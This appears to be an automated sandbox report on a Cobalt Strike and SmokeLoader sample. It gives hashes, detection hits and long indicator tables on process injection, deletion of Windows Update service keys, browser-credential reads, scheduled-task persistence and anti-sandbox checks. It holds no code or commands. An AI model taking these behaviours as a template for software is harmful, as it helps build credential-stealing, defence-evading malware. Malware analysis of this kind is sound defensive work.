cobaltstrike | fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856

Analysis

max time kernel
149s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2022 08:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
Size

1.4MB
MD5

fc330692d17e8cbea9ebe300ed6077de
SHA1

93e67adbf89bed48a8f9d81de6d15baa88721795
SHA256

fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856
SHA512

7732430ba48f1a541f687be30eacfec57e24fa2cd22fb416fd135d3db59c7e681e93611e575688d42f8497186411a65d04d6d1f9aba73cc30a26ed215b70b941
SSDEEP

24576:dcEttPVEw1JS1ttl9hnsfQEvIHWBZlRrzl5qPcWOO7BkSG1L1BAT:X9iwSblAfQiI2jz/qPcWBKzLA

Score

10^/10

cobaltstrike smokeloader backdoor evasion spyware stealer trojan

Malware Config

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike

Detects Smokeloader packer 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5016-142-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral1/memory/5016-146-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral1/memory/1160-160-0x0000000000920000-0x0000000000924000-memory.dmp	family_smokeloader

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateProcessExOtherParentProcess 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 4220 created 3392	4220	WerFault.exe	DllHost.exe
PID 1204 created 3500	1204	WerFault.exe	DllHost.exe
PID 5028 created 4340	5028	WerFault.exe	DllHost.exe
PID 320 created 3228	320	WerFault.exe	DllHost.exe
PID 2740 created 316	2740	WerFault.exe	DllHost.exe
PID 3112 created 2500	3112	WerFault.exe	DllHost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs

Processes:

72EE.exepowershell.EXEsvchost.exenvdrivesllapi.exe

description	pid	process	target process
PID 3532 created 1996	3532	72EE.exe	Explorer.EXE
PID 3532 created 1996	3532	72EE.exe	Explorer.EXE
PID 3532 created 1996	3532	72EE.exe	Explorer.EXE
PID 3532 created 1996	3532	72EE.exe	Explorer.EXE
PID 3532 created 1996	3532	72EE.exe	Explorer.EXE
PID 3532 created 1996	3532	72EE.exe	Explorer.EXE
PID 3176 created 604	3176	powershell.EXE	winlogon.exe
PID 4480 created 3500	4480	svchost.exe	DllHost.exe
PID 4480 created 3392	4480	svchost.exe	DllHost.exe
PID 4480 created 4340	4480	svchost.exe	DllHost.exe
PID 4480 created 3228	4480	svchost.exe	DllHost.exe
PID 4480 created 316	4480	svchost.exe	DllHost.exe
PID 4480 created 2500	4480	svchost.exe	DllHost.exe
PID 788 created 1996	788	nvdrivesllapi.exe	Explorer.EXE
PID 788 created 1996	788	nvdrivesllapi.exe	Explorer.EXE
PID 788 created 1996	788	nvdrivesllapi.exe	Explorer.EXE

Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

72EE.exe73F8.exe8416.exenvdrivesllapi.exesvcupdater.exe

pid process

3532 72EE.exe
4680 73F8.exe
716 8416.exe
788 nvdrivesllapi.exe
5088 svcupdater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3532	72EE.exe
4680	73F8.exe
716	8416.exe
788	nvdrivesllapi.exe
5088	svcupdater.exe

Drops file in System32 directory 6 IoCs

Processes:

svchost.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

72EE.exe8416.exenvdrivesllapi.exe

pid process

3532 72EE.exe
3532 72EE.exe
716 8416.exe
716 8416.exe
788 nvdrivesllapi.exe
788 nvdrivesllapi.exe

pid	process
3532	72EE.exe
3532	72EE.exe
716	8416.exe
716	8416.exe
788	nvdrivesllapi.exe
788	nvdrivesllapi.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

72EE.exepowershell.EXE

description	pid	process	target process
PID 3532 set thread context of 2624	3532	72EE.exe	dialer.exe
PID 3176 set thread context of 1128	3176	powershell.EXE	dllhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4300 sc.exe
3164 sc.exe
2972 sc.exe
2328 sc.exe
1320 sc.exe
1624 sc.exe
1180 sc.exe
1380 sc.exe
4420 sc.exe
5032 sc.exe

pid	process
4300	sc.exe
3164	sc.exe
2972	sc.exe
2328	sc.exe
1320	sc.exe
1624	sc.exe
1180	sc.exe
1380	sc.exe
4420	sc.exe
5032	sc.exe

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3240	3500	WerFault.exe	DllHost.exe
3856	3392	WerFault.exe	DllHost.exe
2728	4340	WerFault.exe	DllHost.exe
932	3228	WerFault.exe	DllHost.exe
4756	316	WerFault.exe	DllHost.exe
2648	2500	WerFault.exe	DllHost.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3612 schtasks.exe

pid	process
3612	schtasks.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 38 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	38	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exeExplorer.EXE

pid	process
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1996 Explorer.EXE

pid	process
1996	Explorer.EXE

Suspicious behavior: MapViewOfSection 13 IoCs

Processes:

fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exeExplorer.EXE

pid	process
5016	fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE
1996	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXE73F8.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeShutdownPrivilege	1996	Explorer.EXE
Token: SeCreatePagefilePrivilege	1996	Explorer.EXE
Token: SeDebugPrivilege	4680	73F8.exe
Token: SeShutdownPrivilege	3444	powercfg.exe
Token: SeCreatePagefilePrivilege	3444	powercfg.exe
Token: SeShutdownPrivilege	2772	powercfg.exe
Token: SeCreatePagefilePrivilege	2772	powercfg.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeShutdownPrivilege	2128	powercfg.exe
Token: SeCreatePagefilePrivilege	2128	powercfg.exe
Token: SeShutdownPrivilege	3144	powercfg.exe
Token: SeCreatePagefilePrivilege	3144	powercfg.exe
Token: SeIncreaseQuotaPrivilege	5000	powershell.exe
Token: SeSecurityPrivilege	5000	powershell.exe
Token: SeTakeOwnershipPrivilege	5000	powershell.exe
Token: SeLoadDriverPrivilege	5000	powershell.exe
Token: SeSystemProfilePrivilege	5000	powershell.exe
Token: SeSystemtimePrivilege	5000	powershell.exe
Token: SeProfSingleProcessPrivilege	5000	powershell.exe
Token: SeIncBasePriorityPrivilege	5000	powershell.exe
Token: SeCreatePagefilePrivilege	5000	powershell.exe
Token: SeBackupPrivilege	5000	powershell.exe
Token: SeRestorePrivilege	5000	powershell.exe
Token: SeShutdownPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeSystemEnvironmentPrivilege	5000	powershell.exe
Token: SeRemoteShutdownPrivilege	5000	powershell.exe
Token: SeUndockPrivilege	5000	powershell.exe
Token: SeManageVolumePrivilege	5000	powershell.exe
Token: 33	5000	powershell.exe
Token: 34	5000	powershell.exe
Token: 35	5000	powershell.exe
Token: 36	5000	powershell.exe
Token: SeIncreaseQuotaPrivilege	5000	powershell.exe
Token: SeSecurityPrivilege	5000	powershell.exe
Token: SeTakeOwnershipPrivilege	5000	powershell.exe
Token: SeLoadDriverPrivilege	5000	powershell.exe
Token: SeSystemProfilePrivilege	5000	powershell.exe
Token: SeSystemtimePrivilege	5000	powershell.exe
Token: SeProfSingleProcessPrivilege	5000	powershell.exe
Token: SeIncBasePriorityPrivilege	5000	powershell.exe
Token: SeCreatePagefilePrivilege	5000	powershell.exe
Token: SeBackupPrivilege	5000	powershell.exe
Token: SeRestorePrivilege	5000	powershell.exe
Token: SeShutdownPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeSystemEnvironmentPrivilege	5000	powershell.exe
Token: SeRemoteShutdownPrivilege	5000	powershell.exe
Token: SeUndockPrivilege	5000	powershell.exe
Token: SeManageVolumePrivilege	5000	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXE73F8.execmd.execmd.execmd.exe72EE.exe

description	pid	process	target process
PID 1996 wrote to memory of 3532	1996	Explorer.EXE	72EE.exe
PID 1996 wrote to memory of 3532	1996	Explorer.EXE	72EE.exe
PID 1996 wrote to memory of 4680	1996	Explorer.EXE	73F8.exe
PID 1996 wrote to memory of 4680	1996	Explorer.EXE	73F8.exe
PID 1996 wrote to memory of 4680	1996	Explorer.EXE	73F8.exe
PID 1996 wrote to memory of 716	1996	Explorer.EXE	8416.exe
PID 1996 wrote to memory of 716	1996	Explorer.EXE	8416.exe
PID 1996 wrote to memory of 1160	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1160	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1160	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1160	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1124	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1124	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1124	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1124	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1980	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1980	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1980	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1328	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1328	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1328	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 1328	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 3652	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 3652	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 3652	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 3648	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 3648	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 3648	1996	Explorer.EXE	explorer.exe
PID 1996 wrote to memory of 3648	1996	Explorer.EXE	explorer.exe
PID 4680 wrote to memory of 1192	4680	73F8.exe	cmd.exe
PID 4680 wrote to memory of 1192	4680	73F8.exe	cmd.exe
PID 4680 wrote to memory of 1192	4680	73F8.exe	cmd.exe
PID 1192 wrote to memory of 3612	1192	cmd.exe	schtasks.exe
PID 1192 wrote to memory of 3612	1192	cmd.exe	schtasks.exe
PID 1192 wrote to memory of 3612	1192	cmd.exe	schtasks.exe
PID 4464 wrote to memory of 4300	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 4300	4464	cmd.exe	sc.exe
PID 5084 wrote to memory of 3444	5084	cmd.exe	powercfg.exe
PID 5084 wrote to memory of 3444	5084	cmd.exe	powercfg.exe
PID 5084 wrote to memory of 2772	5084	cmd.exe	powercfg.exe
PID 5084 wrote to memory of 2772	5084	cmd.exe	powercfg.exe
PID 4464 wrote to memory of 3164	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 3164	4464	cmd.exe	sc.exe
PID 5084 wrote to memory of 2128	5084	cmd.exe	powercfg.exe
